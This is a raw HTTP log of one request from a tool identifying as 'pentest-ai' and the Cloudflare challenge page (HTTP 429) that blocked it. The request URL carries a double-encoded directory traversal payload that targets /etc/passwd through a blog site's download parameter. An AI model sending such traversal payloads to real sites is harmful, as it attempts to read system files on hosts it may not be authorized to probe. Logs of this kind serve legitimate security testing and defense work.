REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?file=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9872
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b8dd9caa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=F7OZXsJrS3ZzbXH2eeYqquNfn2AMA4vhIw%2BWkxMMP3cQ%2BZUMsvdjzoxzesEVq%2FueMPELx0GWjSNfeeYH293OYU7MEGoL%2B5I%2B7LhiKaZxctKELD3W86OFyqF5i2EX95wBVQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b8dd9caa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'BTKBR0jz55WjXL_VvBd7jRq8j1nLyxqT20FC.p3gzZU-1784280675-1.2.1.1-kyOUxJYQKzKKcWMjzQLV5pb0.AQKBYfYTDcB7ML6.Tl8hwmMFDbZeLsydfW5V6GS',cITimeS: '1784280675',cRay: 'a1c83b8dd9caa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?file=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=hSK.w.FSwfkhW39s15a0BcMne1w0yuLODZaMPuOVTG0-1784280675-1.0.1.1-IO84dvfHZCldqdJtG6dU17hGM637zxwq5HJbiMpLsjQ",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?file=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=hSK.w.FSwfkhW39s15a0BcMne1w0yuLODZaMPuOVTG0-1784280675-1.0.1.1-IO84dvfHZCldqdJtG6dU17hGM637zxwq5HJbiMpLsjQ",md: '72qoiCVSff6Jum20QIxdRJfMFeTigYYlP1_A_gbF9lY-1784280675-1.2.1.1-Y8NsZNbIgF3yz.88.K4Q.VxJASafuyLM28hZuqAdH9W45DEluHhxXcLJ767D.hKhTzAozGoNQZgfOXf8uNqfofTlvHCT9cLGwbBIfklkg8Q0wFnO36Q5e.vx5E3E.FT0kh4JrutSzX58M5JuOPVTBx9JIdqxwQUyQ_.OtIf1QVN3Yjyvbod6m4Tkz2gHh6.2ZeJalw41s8Gs7w9YqXRDmlsmkwawZOhDx0No7TX7gb7D5QYgRY7IOPIP2xJknwJHdi3QiRAMu5F_abxxSZQLvss1t0wKXJNJQwtv7ng.M7FvCxCJUB5e5xH0lOyr5gp1fgaR5Ka.0EPmlpPq1G62m.QR5AzkC1AlyDrALAFoFiHnuoGvylH4uy3Lc0ojT9glUx5uriJFHqoQfN.2AKTLxO_vSYGFNbeFDxosP4SatCJaB92VBdyWs8leV12F9I1bLLX0YX4jCrXcOAcQjXr8CoSJcY9ZHXDM8HFlGXOjLEdTOcgPTxl72ClITO4Xm_mredi6AvqowKPMv8HWPwzopzMNuTZlHzZ1HM6ON1UtC9ghuhzNOtAsb0O6C4lawrGUxK11HG0JV.LZ3IZg20uaJNHp77WdSZZnbF6Ojetu6qyzqq4AzvHgJwoLqBj1lBsXrgWTfvbS4eUMtOG2BZ5H1vEd5wNlFgPOdqbl7OHco4Ki8dClLkV4Q_UnNbzZcB_p2Cnkww1NAxrGKESKEVWyF4dojzcxpfMrPGx0RBfcWAk4K4g29r4tYsqg0aoZxJSA8f.rl_NGuU47_EHfA0e8htkBTUQ2_tBoTJwkpAxL8MsdjTFsXYXCkHcFZ9LKt4Czl9yfkOEQuraI70AanNOyMLCbk0EU855bZtvZXKdCvNKvjvtG_EZru8cvDXmqrwxmKNDsLVlvl5I058u8zlNe7mqsmbHrGIHYVy73dSx.OYiTULp9AiZhLZJmLHs.ILOYMPUb.CaSykLh4LsgjiDJpcSDaoYpqH994N1cM1m43Np0f3WmAG3aJdGkBq7aLzZIdIDNKBOuO96pVKZKimUdzDhczEPhbjmZvDZwKOf0L3EpZv.3S07.dviFgYXT9Nl.Uv52HnMs5WJ88.t88Ld4FfKSvlDivimOwI9bHjBnmuWO6DYW3p7SZg.oJnkY7BpryV.RTvt4B5ux3wjkzRLCaIOF23ySxacHsyPTTY5lzhjDHhMcitH0yRgu6Xgmpbu3mafiFubSnBBIhFif4ASnUoNK84DB9QgBKQBbCtKNgCrQ0_QfXRQGCH9fGjxXRSICYdLjfJHuVH4dglKKKF5KaJGcLzRgBwavol57tHZL5ZSwByejkIyFt7FJz6rkgKjQ7YajxHB9PFDmA8HPdSRlJA',mdrd: 'gI9.U98mcLkxyTwZkwQVT7DMeXtlWZ5YrtNhAGG9Cwc-1784280675-1.2.1.1-cvkI8i5bjG8ZFod8fLx4QBrKtetvipBQyeeo9Zv14aWhes8waoQysHL28CG1dl61aFcTqU21TBPzP_ZWzNiWuU9A3AUoxkjDQ_lAAoBURocdys3wtrSzMSALQYCJJWX4C.C7VxcwEJehtRHElvoeWCWaLCk2pAHMDz25uUZrP2tcId6p8rAcHPtvFFCO3Hc2Pb3i0sCdYCVV65.mb2OhvF7YNquG2Sny_83Z6yaDA5GLp0e5uAqtYSGcc3Dwiyka',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b8dd9caa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?file=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=hSK.w.FSwfkhW39s15a0BcMne1w0yuLODZaMPuOVTG0-1784280675-1.0.1.1-IO84dvfHZCldqdJtG6dU17hGM637zxwq5HJbiMpLsjQ"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
